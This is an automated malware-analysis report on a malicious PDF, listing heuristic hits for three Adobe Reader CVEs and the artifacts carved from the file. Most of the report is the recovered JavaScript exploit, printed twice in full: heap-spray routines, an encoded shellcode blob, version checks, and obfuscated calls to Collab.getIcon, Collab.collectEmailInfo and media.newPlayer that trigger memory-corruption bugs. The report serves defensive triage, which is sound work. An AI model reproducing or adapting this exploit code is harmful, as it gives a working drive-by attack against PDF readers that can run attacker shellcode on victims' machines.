MALICIOUS
412
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
The PDF file was flagged as malicious by an ML classifier with high confidence. It contains embedded JavaScript, which is a common technique for delivering second-stage malware. The JavaScript stream, named 'javascript_obj0043_000.js', is likely responsible for downloading and executing a malicious payload, although its exact functionality could not be fully determined due to obfuscation.
Machine Learning
- Nyx PDF Classifier malicious score 0.9988
Heuristics 10
-
media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (matched in decompressed stream)
-
Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (matched in decompressed stream)
-
Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (matched in decompressed stream)
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
try{eval("this.m"+"ed"+"ia.n"+"ewPl"+"ayer(null)");} -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERYBounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
-
Object number defined twice with different bodies info PDF_DUPLICATE_OBJ_BODY_INCREMENTALThe same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
- http://ns.adobe.com/pdf/1.3/In PDF document text
- http://ns.adobe.com/pdfx/1.3/In PDF document text
- http://ns.adobe.com/xap/1.0/In PDF document text
- http://ns.adobe.com/xap/1.0/mm/In PDF document text
- http://purl.org/dc/elements/1.1/In PDF document text
- http://ns.adobe.com/photoshop/1.0/In PDF document text
Extracted artifacts 7
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0043_000.js |
pdf-javascript-stream | PDF /JS object 43 at offset 0x2430 | 2172 bytes |
SHA-256: 936e2fe1881cc08af3c77ee20ad39a53e4e5331c62787a3c3455c03a63223df6 |
|||
Preview scriptFirst 1,000 lines of the extracted script
<</Length 2116/Filter[/FlateDecode]>>stream
x�� koܸ�� � P � a7 J�(��{@����\{A�6{M��Ғ����������w8�$j_q `���pޜ y�Jn�y5[-�M��{e�?�����¹ ����o� �)�3v�L&o� ��� e>,�z�s� b����V�jS,�
�y>{u�j�n���R��)��v ��Ʉr� d4i�
`Y�Ǜ�(s� 5Z�+��Kӽ�|�f��w�� Ȗ �����ݝ� Z���l.j�p.���ͥ�� �g(��Y`@� pԘa��ʪ�-�=2�
�u� ����kP �B,V��x) ��E� ���;�^c���9�NH�2Q ���rw5���Q������� A: ��|�YV�� ^5��W)r-m�_#�� � �?v� � ���c�u��H� ��L&�� �,N&�4cl2�r ��F@
� 8s� C� ��S�)Q�� ����� �I�� 9RT�Q�)R k)���R U� ���I�I 0F8�!S � �>�L4�(r�X�� %L-N- ,�RQ� �G�6�hOL �u��F �Lma��C%��1A<E~�� �T�4r8�Oqo�<1�dhOnv�� �h �k�$F � ��0�$G"?j"<�`rĄV|ZN C�� !g��|��*n2�b�҃�9Z�P�@ �+�d �m�~� �X�� � �z�v-y���:3�ו�bN J� Osij#~齚S� ��a���*�{5� *�b���щ�H ɴ���u'�X�(!B{jkES-9ֳ8��f�VW� � 2 c�U�0�;}~ s �V�ea��B��u�� �C�=*b�%�P� ��(��� �:��� ��h�m~� �# l]�v�w�~~�~ک��r�� �Sq�cuJN}�P� ��s��#
k�Y�&O� ͓�� �h��GUff� 봞��}���vY� g�9��\tz��l�3�� j�n×Xh�Iݻ"���x�`���~Q� �� iY(t�B ��33MhsR��oi�� ���]+&�' $'��os+ �d �� d��I9G��s� ��P ���Fk߯�c377���I���9-G�Sj�����4=�^"�� n�HĿDZ�-�eF͜��%��P�[1���v��F�K2�&Z�=�[��=�0�Hs�F(9�}�`d㩎��Խ�����#3ӛ��v;�$����HfVd0b SK�_��%��w�� �$��gzjX=YXq X�X� ���n9�5Jlש�;�5w�o?p ��к�[��] .ox]��� o����@4�6JFl���+" q�nc�uK��m ? ~�&1�Uk
� ~�{u���-��e^�֕�� ���U��j>� � �
�a �:��T��+o%�� ْ+ �� � �h�N����έ�� �Vl<�|Cr�k�����(�� �Xx��a� 1 �<a�&j �� c�|�P �oh +j�`o �)`�8 �Q�7�
?�)`X< L�����ބ�
�Ti� T� x� (�j�J � c� \ �R �1/ Υz�H��| �� ����e�A�9����
��� ����lC��2��u��� ��1f��_~zX �M5� נ��z�m���o��?}�ǧ_'���w�7o �ϫ����, � ܁����+��瘎���������6�e���� ] �����������/�=��" ���/�* ��=�{nu3+� ��)� .���� ��GQx��|�C|��^Ϋ�� ��� Ph�Jv˾�xQAݟ�z���?�������L<�⟢(�� �N2l�y��ٲ� A �A� d$ HB(A���4t} u��# W|;l4�L�)դZk �!�J � ���5j� Y�b68,���~���ļ N "! D��Y�U� p�6>��l7�)� �
��ٶ�5 ֮N� h RJЩT�;D��ឭ�
z�
")P$t�<�yʝ�_�;��� ��,Ow�Cي��R�����,d ��o���em�:� P;� �ç�L �5}�i��CK�p �� ~ �F�� J
9����z��w�� R�Ey����Y�p|� j��ٯ��1O����0�� � N: H�;�}� � �����-� �� �c �J K>�0!k � �5�pY cJQ�}� �n*��#� �� ;V: .z�F>������ �9���o�x��o �v�l��iR].��ښj�E�_`�!�N h:�makb�P �l[��ѣ7� UF� �Y&����3CE��m��GoY�{|j8T �.� L�"�
endstrea
|
|||
javascript_obj0043_001.js |
pdf-javascript-stream | PDF /JS object 43 at offset 0x2465 | 6484 bytes |
SHA-256: ad00489fb099dbbe2f8189405c957e21d283c53b58a6f6ac932472b851dd9c9a |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 21 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
function urpl(sc){
var keyu= "%u";
var re = /XX/g;
sc = sc.replace(re,keyu);
return sc;
}
function xxsc(sc){
var sprdataxx = "XX4a4bXX4647";
var esprpl=unescape;
var urpled = esprpl(urpl(sc));
var blknum = 0x41000;
var sprdata = esprpl(urpl(sprdataxx));
while(sprdata.length<blknum)
sprdata+=sprdata;
sprblk=sprdata.substring(0,sprdata.length);
scblk=urpled.substring(0,urpled.length);
memory=new Array();
var k = 0;
while (k < 200)
{
memory[k]=sprblk+scblk;
k++;
}
}
function repeat(count,what){
var v = "";
while (--count >= 0) v += what;
return v;
}
var s = "XX23ebXX4840XX5f43XX5b57XX8b66XX3c03XX7430XX2c1bXXc063XX04e0XXec80XX8043XX0fe4XXc402XXea34XX0788XX4343XXeb47XXe8e3XXffd8XXffffXX4e69XX4963XX4d71XX4571XX4d71XX4d71XX4d6bXX4563XX4d71XX4d71XX4d71XX4d71XX446eXX4e69XX4463XX4967XX4d72XX4d6dXX4d71XX4463XX4d70XX4f72XX526bXX4364XX4d72XX4963XX506aXX4c71XX4971XX4967XX4571XX4366XX4f6cXX4a67XX446aXX4a6cXX4866XX4464XX506aXX4a64XX4871XX476cXX4566XX4b63XX4c6cXX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4f67XX4c64XX4e6fXX4d6cXX516bXX4e67XX4d70XX4d71XX4d71XX4d71XX4469XX4d6dXX4971XX4469XX4d6cXX4972XX4a67XX4469XX4d6dXX4571XX4669XX4c69XX4a65XX4d72XX4d6dXX4d71XX4964XX4a69XX4468XX5268XX4d72XX4d6dXX4d71XX4c70XX4665XX4e68XX4f71XX4563XX506fXX4e71XX4d71XX4d71XX4c69XX5065XX5171XX4b63XX4f64XX4964XX4c70XX4d65XX4c70XX4b66XX4f6bXX4368XX476eXX4c65XX4469XX4c68XX4665XX4d72XX4d6dXX4d71XX4f6bXX4469XX4f71XX4f6bXX4470XX4d66XX516cXX5171XX4f6dXX4f6dXX4463XX5164XX4669XX4c68XX4e63XX4d72XX4d6dXX4d71XX4c70XX4f64XX4a68XX4d71XX4d6fXX4d71XX4d71XX4463XX4c72XX436bXX4d71XX4f6eXX4864XX4c6aXX4e65XX4d72XX4d6dXX4d71XX4c69XX4564XX4864XX516cXX5171XX4470XX5265XX506cXX4671XX4f6dXX4e69XX4764XX4d71XX4d72XX4d71XX4d71XX4b6cXX5263XX4669XX4c68XX4666XX4d72XX4d6dXX4d71XX4469XX4563XX5271XX4d71XX4571XX4d71XX4d71XX4d6eXX436bXX4d6dXX4864XX4c6aXX4668XX4d72XX4d6dXX4d71XX4669XX4c69XX4e66XX4d72XX4d6dXX4d71XX4c71XX5265XX4669XX4c69XX5266XX4d72XX4d6dXX4d71XX436bXX4d71XX436bXX4d71XX436bXX4d71XX4864XX4c68XX4666XX4d72XX4d6dXX4d71XX4864XX4c6aXX4a68XX4d72XX4d6dXX4d71XX4469XX4c68XX4e66XX4d72XX4d6dXX4d71XX4a69XX4468XX4a66XX4d72XX4d6dXX4d71XX4469XX4c6aXX4666XX4d72XX4d6dXX4d71XX4a69XX4c69XX5068XX4e72XX4d6dXX4d71XX4d6eXX4f6eXX436bXX4d71XX506eXX526eXX4f6eXX4b6eXX4864XX4c68XX4e63XX4d72XX4d6dXX4d71XX4864XX4c67XX5268XX4d72XX4d6dXX4d71XX4471XX4d65XX526cXX4b71XX4463XX4d6bXX4469XX4c68XX4e66XX4d72XX4d6dXX4d71XX4469XX4f71XX4a70XX526fXX4d6eXX516dXX4f6dXX516cXX4971XX4469XX4c68XX4666XX4d72XX4d6dXX4d71XX4f6dXX4663XX446eXX4864XX4864XX4864XX4469XX4c68XX4e66XX4d72XX4d6dXX4d71XX4c70XX4665XX4368XX4364XX4464XX4964XX4a64XX4463XX4571XX4469XX4f71XX4470XX4b65XX516cXX4f71XX4f6dXX4e6dXX4470XX4a65XX4b6cXX5164XX4c69XX4f65XX5171XX4469XX4468XX5266XX4d72XX4d6dXX4d71XX4668XX4d71XX5071XX4d71XX4d71XX5167XX4b63XX4a64XX4469XX4468XX4e66XX4d72XX4d6dXX4d71XX4864XX4c68XX4666XX4d72XX4d6dXX4d71XX4864XX4c6aXX5265XX4d72XX4d6dXX4d71XX4864XX4c68XX5266XX4d72XX4d6dXX4d71XX4c65XX4864XX4c68XX4666XX4d72XX4d6dXX4d71XX4864XX4c6aXX5265XX4d72XX4d6dXX4d71XX436bXX4d71XX4864XX4c6aXX4665XX4d72XX4d6dXX4d71XX4c65XX4d6bXX4469XX4c68XX4a65XX4d72XX4d6dXX4d71XX4c71XX4f6cXX4970XX4469XX4f6cXX456cXX4c71XX4c68XX4a65XX4d72XX4d6dXX4d71XX4f6eXX4469XX476dXX4572XX4469XX4f6cXX4d6fXX4c71XX4c68XX4a65XX4d72XX4d6dXX4d71XX4c70XX4d65XX4c70XX4b66XX4f6eXX4469XX4f70XX4c71XX4c68XX4a65XX4d72XX4d6dXX4d71XX4967XX4570XX4d63XX516cXX5071XX4e65XX4365XX4a71XX4c71XX4d66XX4463XX5164XX4470XX5072XX516cXX4671XX476eXX4c69XX4f65XX5171XX466dXX516cXX5270XX4463XX4966XX476eXX4469XX4f66XX476eXX446fXX4f6eXX4d6fXX446fXX4c6aXX4a65XX4d72XX4d6dXX4d71XX4e66XX4363XX4c71XX4f6eXX516fXX4c71XX4c6aXX4a65XX4d72XX4d6dXX4d71XX4871XX5068XX4b71XX4e65XX4d63XX4b71XX4c71XX4f6dXX4972XX4c71XX4c69XX4a65XX4d72XX4d6dXX4d71XX4469XX4d71XX4c71XX4c69XX4a65XX4d72XX4d6dXX4d71XX4669XX5071XX4463XX4e71XX476eXX4e6bXX4c65XX3030"
function exp8() {
var spd = "XX000aXX000aXX000aXX000a";
var esc = unescape;
var spr = esc(urpl(spd));
var of = repeat(4096, spr);
var a=["\x5f\x4e\x2e\x62\x75\x6e\x64\x6c\x65"];//javascript comment
Collab["\x67\x65\x74\x49\x63\x6f\x6e"](of+a[0x0]);
}
function exp9() {
var esprpl=unescape;
var sc = esprpl(urpl(s));
var ret = unescape("%u0c0c%u0c0c");
var sc2 = unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u6b62%u546e%u596a%u6c76%u506a%u5470%u666f%u7441%u4356%u586c%u726d%u4153%u4b4a%u624c%u7948%u4659%u6156%u7761%u7051%u7842%u5342%u4a64%u6365%u7464%u4972%u5766%u534d%u7569");
while(ret.length <= 0x8000) ret+=ret;
ret=ret.substring(0,0x8000 - s.length);
memory=new Array();
for(i=0;i<0x2000;i++) {
memory[i]= ret + sc;
}
util.printd("jbBFAXmYeqFJUPOXePHkjhAybWoldsgWfmBw", new Date());
util.printd("noCXCPHRXLpZKyNpKJJWxBkvpjKLYwpMfmCG", new Date());
try{eval("this.m"+"ed"+"ia.n"+"ewPl"+"ayer(null)");}
catch(e) {}
util.printd(sc2, new Date());
}
function start()
{
var esprpl=unescape;
var sc = esprpl(urpl(s));
if (app.viewerVersion >= 7.0)
{
plin = repeat(1124,unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%u0b0b%u0028%u0aeb%u0aeb") + unescape("%u4346%u4a4b") + repeat(122,unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%u4a4b%u4748%u4a4b%u4748%u4a4b%u4748") + sc + repeat(1256,unescape("%u4a4b%u4748"));
}
else
{
ef6 = unescape("%uf6eb%uf6eb") + unescape("%u0b0b%u0019");
plin = repeat(80,unescape("%u4141%u4141")) + sc + repeat(80,unescape("%u4241%u4142"))+ unescape("%uf7e9%ufff9")
+unescape("%uffff%uffff") + unescape("%uf6eb%uf4eb") + unescape("%uf2eb%uf1eb");
while ((plin.length % 8) != 0)
plin = unescape("%u4141") + plin;
plin += repeat(2626,ef6);
}
if (app.viewerVersion >= 6.0)
{
var a=[];//javascript for adobe
Collab["\x63\x6f\x6c\x6c\x65\x63\x74\x45\x6d\x61\x69\x6c\x49\x6e\x66\x6f"]({subj:a[0x0],msg:plin});
}
}
var ver = app.viewerVersion
if ((ver >= 9.1) || ((ver > 8.102) && (ver < 9.0)))
{
var inBrowser = this.external;
if (inBrowser)
var shaft = app.setTimeOut("exp9()",1200);
else
exp9();
}
else
{
if(ver >= 8.0)
{
xxsc(s);
var inBrowser = this.external;
if (inBrowser)
var shaft = app.setTimeOut("exp8()",1200);
else
exp8();
}
else
{
if(ver >= 6.0)
{
var inBrowser = this.external;
if (inBrowser)
var shaft = app.setTimeOut("start()",1200);
else
start();
}
else
{
while(1){};
}
}
}
|
|||
javascript_obj0043_001_shellcode_00.bin |
pdf-js-shellcode | pdf-js-unescape-shellcode recovered from PDF /JS object 43 at offset 0x2465 | 72 bytes |
SHA-256: 1d18be7a9a735b4efb9816cbf36ca8f2995fa7e3951c97e5ce9977168aa1280b |
|||
generic_stage_recovery_000.js |
deobfuscated-js | generic stage recovery split-literal-normalize from combined JavaScript objects at offset 0x2430 | 8645 bytes |
SHA-256: 3c763ae8d12646cf96aae88fe53615d8f63f2846394a3d827bfa6698a5af60a2 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 21 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
<</Length 2116/Filter[/FlateDecode]>>stream
x�� koܸ�� � P � a7 J�(��{@����\{A�6{M��Ғ����������w8�$j_q `���pޜ y�Jn�y5[-�M��{e�?�����¹ ����o� �)�3v�L&o� ��� e>,�z�s� b����V�jS,�
�y>{u�j�n���R��)��v ��Ʉr� d4i�
`Y�Ǜ�(s� 5Z�+��Kӽ�|�f��w�� Ȗ �����ݝ� Z���l.j�p.���ͥ�� �g(��Y`@� pԘa��ʪ�-�=2�
�u� ����kP �B,V��x) ��E� ���;�^c���9�NH�2Q ���rw5���Q������� A: ��|�YV�� ^5��W)r-m�_#�� � �?v� � ���c�u��H� ��L&�� �,N&�4cl2�r ��F@
� 8s� C� ��S�)Q�� ����� �I�� 9RT�Q�)R k)���R U� ���I�I 0F8�!S � �>�L4�(r�X�� %L-N- ,�RQ� �G�6�hOL �u��F �Lma��C%��1A<E~�� �T�4r8�Oqo�<1�dhOnv�� �h �k�$F � ��0�$G"?j"<�`rĄV|ZN C�� !g��|��*n2�b�҃�9Z�P�@ �+�d �m�~� �X�� � �z�v-y���:3�ו�bN J� Osij#~齚S� ��a���*�{5� *�b���щ�H ɴ���u'�X�(!B{jkES-9ֳ8��f�VW� � 2 c�U�0�;}~ s �V�ea��B��u�� �C�=*b�%�P� ��(��� �:��� ��h�m~� �# l]�v�w�~~�~ک��r�� �Sq�cuJN}�P� ��s��#
k�Y�&O� ͓�� �h��GUff� 봞��}���vY� g�9��\tz��l�3�� j�n×Xh�Iݻ"���x�`���~Q� �� iY(t�B ��33MhsR��oi�� ���]+&�' $'��os+ �d �� d��I9G��s� ��P ���Fk߯�c377���I���9-G�Sj�����4=�^"�� n�HĿDZ�-�eF͜��%��P�[1���v��F�K2�&Z�=�[��=�0�Hs�F(9�}�`d㩎��Խ�����#3ӛ��v;�$����HfVd0b SK�_��%��w�� �$��gzjX=YXq X�X� ���n9�5Jlש�;�5w�o?p ��к�[��] .ox]��� o����@4�6JFl���+" q�nc�uK��m ? ~�&1�Uk
� ~�{u���-��e^�֕�� ���U��j>� � �
�a �:��T��+o%�� ْ+ �� � �h�N����έ�� �Vl<�|Cr�k�����(�� �Xx��a� 1 �<a�&j �� c�|�P �oh +j�`o �)`�8 �Q�7�
?�)`X< L�����ބ�
�Ti� T� x� (�j�J � c� \ �R �1/ Υz�H��| �� ����e�A�9����
��� ����lC��2��u��� ��1f��_~zX �M5� נ��z�m���o��?}�ǧ_'���w�7o �ϫ����, � ܁����+��瘎���������6�e���� ] �����������/�=��" ���/�* ��=�{nu3+� ��)� .���� ��GQx��|�C|��^Ϋ�� ��� Ph�Jv˾�xQAݟ�z���?�������L<�⟢(�� �N2l�y��ٲ� A �A� d$ HB(A���4t} u��# W|;l4�L�)դZk �!�J � ���5j� Y�b68,���~���ļ N "! D��Y�U� p�6>��l7�)� �
��ٶ�5 ֮N� h RJЩT�;D��ឭ�
z�
")P$t�<�yʝ�_�;��� ��,Ow�Cي��R�����,d ��o���em�:� P;� �ç�L �5}�i��CK�p �� ~ �F�� J
9����z��w�� R�Ey����Y�p|� j��ٯ��1O����0�� � N: H�;�}� � �����-� �� �c �J K>�0!k � �5�pY cJQ�}� �n*��#� �� ;V: .z�F>������ �9���o�x��o �v�l��iR].��ښj�E�_`�!�N h:�makb�P �l[��ѣ7� UF� �Y&����3CE��m��GoY�{|j8T �.� L�"�
endstrea
function urpl(sc){
var keyu= "%u";
var re = /XX/g;
sc = sc.replace(re,keyu);
return sc;
}
function xxsc(sc){
var sprdataxx = "XX4a4bXX4647";
var esprpl=unescape;
var urpled = esprpl(urpl(sc));
var blknum = 0x41000;
var sprdata = esprpl(urpl(sprdataxx));
while(sprdata.length<blknum)
sprdata+=sprdata;
sprblk=sprdata.substring(0,sprdata.length);
scblk=urpled.substring(0,urpled.length);
memory=new Array();
var k = 0;
while (k < 200)
{
memory[k]=sprblk+scblk;
k++;
}
}
function repeat(count,what){
var v = "";
while (--count >= 0) v += what;
return v;
}
var s = "XX23ebXX4840XX5f43XX5b57XX8b66XX3c03XX7430XX2c1bXXc063XX04e0XXec80XX8043XX0fe4XXc402XXea34XX0788XX4343XXeb47XXe8e3XXffd8XXffffXX4e69XX4963XX4d71XX4571XX4d71XX4d71XX4d6bXX4563XX4d71XX4d71XX4d71XX4d71XX446eXX4e69XX4463XX4967XX4d72XX4d6dXX4d71XX4463XX4d70XX4f72XX526bXX4364XX4d72XX4963XX506aXX4c71XX4971XX4967XX4571XX4366XX4f6cXX4a67XX446aXX4a6cXX4866XX4464XX506aXX4a64XX4871XX476cXX4566XX4b63XX4c6cXX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4f67XX4c64XX4e6fXX4d6cXX516bXX4e67XX4d70XX4d71XX4d71XX4d71XX4469XX4d6dXX4971XX4469XX4d6cXX4972XX4a67XX4469XX4d6dXX4571XX4669XX4c69XX4a65XX4d72XX4d6dXX4d71XX4964XX4a69XX4468XX5268XX4d72XX4d6dXX4d71XX4c70XX4665XX4e68XX4f71XX4563XX506fXX4e71XX4d71XX4d71XX4c69XX5065XX5171XX4b63XX4f64XX4964XX4c70XX4d65XX4c70XX4b66XX4f6bXX4368XX476eXX4c65XX4469XX4c68XX4665XX4d72XX4d6dXX4d71XX4f6bXX4469XX4f71XX4f6bXX4470XX4d66XX516cXX5171XX4f6dXX4f6dXX4463XX5164XX4669XX4c68XX4e63XX4d72XX4d6dXX4d71XX4c70XX4f64XX4a68XX4d71XX4d6fXX4d71XX4d71XX4463XX4c72XX436bXX4d71XX4f6eXX4864XX4c6aXX4e65XX4d72XX4d6dXX4d71XX4c69XX4564XX4864XX516cXX5171XX4470XX5265XX506cXX4671XX4f6dXX4e69XX4764XX4d71XX4d72XX4d71XX4d71XX4b6cXX5263XX4669XX4c68XX4666XX4d72XX4d6dXX4d71XX4469XX4563XX5271XX4d71XX4571XX4d71XX4d71XX4d6eXX436bXX4d6dXX4864XX4c6aXX4668XX4d72XX4d6dXX4d71XX4669XX4c69XX4e66XX4d72XX4d6dXX4d71XX4c71XX5265XX4669XX4c69XX5266XX4d72XX4d6dXX4d71XX436bXX4d71XX436bXX4d71XX436bXX4d71XX4864XX4c68XX4666XX4d72XX4d6dXX4d71XX4864XX4c6aXX4a68XX4d72XX4d6dXX4d71XX4469XX4c68XX4e66XX4d72XX4d6dXX4d71XX4a69XX4468XX4a66XX4d72XX4d6dXX4d71XX4469XX4c6aXX4666XX4d72XX4d6dXX4d71XX4a69XX4c69XX5068XX4e72XX4d6dXX4d71XX4d6eXX4f6eXX436bXX4d71XX506eXX526eXX4f6eXX4b6eXX4864XX4c68XX4e63XX4d72XX4d6dXX4d71XX4864XX4c67XX5268XX4d72XX4d6dXX4d71XX4471XX4d65XX526cXX4b71XX4463XX4d6bXX4469XX4c68XX4e66XX4d72XX4d6dXX4d71XX4469XX4f71XX4a70XX526fXX4d6eXX516dXX4f6dXX516cXX4971XX4469XX4c68XX4666XX4d72XX4d6dXX4d71XX4f6dXX4663XX446eXX4864XX4864XX4864XX4469XX4c68XX4e66XX4d72XX4d6dXX4d71XX4c70XX4665XX4368XX4364XX4464XX4964XX4a64XX4463XX4571XX4469XX4f71XX4470XX4b65XX516cXX4f71XX4f6dXX4e6dXX4470XX4a65XX4b6cXX5164XX4c69XX4f65XX5171XX4469XX4468XX5266XX4d72XX4d6dXX4d71XX4668XX4d71XX5071XX4d71XX4d71XX5167XX4b63XX4a64XX4469XX4468XX4e66XX4d72XX4d6dXX4d71XX4864XX4c68XX4666XX4d72XX4d6dXX4d71XX4864XX4c6aXX5265XX4d72XX4d6dXX4d71XX4864XX4c68XX5266XX4d72XX4d6dXX4d71XX4c65XX4864XX4c68XX4666XX4d72XX4d6dXX4d71XX4864XX4c6aXX5265XX4d72XX4d6dXX4d71XX436bXX4d71XX4864XX4c6aXX4665XX4d72XX4d6dXX4d71XX4c65XX4d6bXX4469XX4c68XX4a65XX4d72XX4d6dXX4d71XX4c71XX4f6cXX4970XX4469XX4f6cXX456cXX4c71XX4c68XX4a65XX4d72XX4d6dXX4d71XX4f6eXX4469XX476dXX4572XX4469XX4f6cXX4d6fXX4c71XX4c68XX4a65XX4d72XX4d6dXX4d71XX4c70XX4d65XX4c70XX4b66XX4f6eXX4469XX4f70XX4c71XX4c68XX4a65XX4d72XX4d6dXX4d71XX4967XX4570XX4d63XX516cXX5071XX4e65XX4365XX4a71XX4c71XX4d66XX4463XX5164XX4470XX5072XX516cXX4671XX476eXX4c69XX4f65XX5171XX466dXX516cXX5270XX4463XX4966XX476eXX4469XX4f66XX476eXX446fXX4f6eXX4d6fXX446fXX4c6aXX4a65XX4d72XX4d6dXX4d71XX4e66XX4363XX4c71XX4f6eXX516fXX4c71XX4c6aXX4a65XX4d72XX4d6dXX4d71XX4871XX5068XX4b71XX4e65XX4d63XX4b71XX4c71XX4f6dXX4972XX4c71XX4c69XX4a65XX4d72XX4d6dXX4d71XX4469XX4d71XX4c71XX4c69XX4a65XX4d72XX4d6dXX4d71XX4669XX5071XX4463XX4e71XX476eXX4e6bXX4c65XX3030"
function exp8() {
var spd = "XX000aXX000aXX000aXX000a";
var esc = unescape;
var spr = esc(urpl(spd));
var of = repeat(4096, spr);
var a=["\x5f\x4e\x2e\x62\x75\x6e\x64\x6c\x65"];//javascript comment
Collab["\x67\x65\x74\x49\x63\x6f\x6e"](of+a[0x0]);
}
function exp9() {
var esprpl=unescape;
var sc = esprpl(urpl(s));
var ret = unescape("%u0c0c%u0c0c");
var sc2 = unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u6b62%u546e%u596a%u6c76%u506a%u5470%u666f%u7441%u4356%u586c%u726d%u4153%u4b4a%u624c%u7948%u4659%u6156%u7761%u7051%u7842%u5342%u4a64%u6365%u7464%u4972%u5766%u534d%u7569");
while(ret.length <= 0x8000) ret+=ret;
ret=ret.substring(0,0x8000 - s.length);
memory=new Array();
for(i=0;i<0x2000;i++) {
memory[i]= ret + sc;
}
util.printd("jbBFAXmYeqFJUPOXePHkjhAybWoldsgWfmBw", new Date());
util.printd("noCXCPHRXLpZKyNpKJJWxBkvpjKLYwpMfmCG", new Date());
try{eval("this.media.newPlayer(null)");}
catch(e) {}
util.printd(sc2, new Date());
}
function start()
{
var esprpl=unescape;
var sc = esprpl(urpl(s));
if (app.viewerVersion >= 7.0)
{
plin = repeat(1124,unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%u0b0b%u0028%u0aeb%u0aeb") + unescape("%u4346%u4a4b") + repeat(122,unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%u4a4b%u4748%u4a4b%u4748%u4a4b%u4748") + sc + repeat(1256,unescape("%u4a4b%u4748"));
}
else
{
ef6 = unescape("%uf6eb%uf6eb") + unescape("%u0b0b%u0019");
plin = repeat(80,unescape("%u4141%u4141")) + sc + repeat(80,unescape("%u4241%u4142"))+ unescape("%uf7e9%ufff9")
+unescape("%uffff%uffff") + unescape("%uf6eb%uf4eb") + unescape("%uf2eb%uf1eb");
while ((plin.length % 8) != 0)
plin = unescape("%u4141") + plin;
plin += repeat(2626,ef6);
}
if (app.viewerVersion >= 6.0)
{
var a=[];//javascript for adobe
Collab["\x63\x6f\x6c\x6c\x65\x63\x74\x45\x6d\x61\x69\x6c\x49\x6e\x66\x6f"]({subj:a[0x0],msg:plin});
}
}
var ver = app.viewerVersion
if ((ver >= 9.1) || ((ver > 8.102) && (ver < 9.0)))
{
var inBrowser = this.external;
if (inBrowser)
var shaft = app.setTimeOut("exp9()",1200);
else
exp9();
}
else
{
if(ver >= 8.0)
{
xxsc(s);
var inBrowser = this.external;
if (inBrowser)
var shaft = app.setTimeOut("exp8()",1200);
else
exp8();
}
else
{
if(ver >= 6.0)
{
var inBrowser = this.external;
if (inBrowser)
var shaft = app.setTimeOut("start()",1200);
else
start();
}
else
{
while(1){};
}
}
}
|
|||
generic_stage_recovery_001.js |
deobfuscated-js | generic stage recovery marker-XX-to-%u from combined JavaScript objects at offset 0x2430 | 5859 bytes |
SHA-256: aa08a6046c37a2c6bc52361ff13fa9e64c4b6316087d9ec67da6d49f23f8e3a2 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 21 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
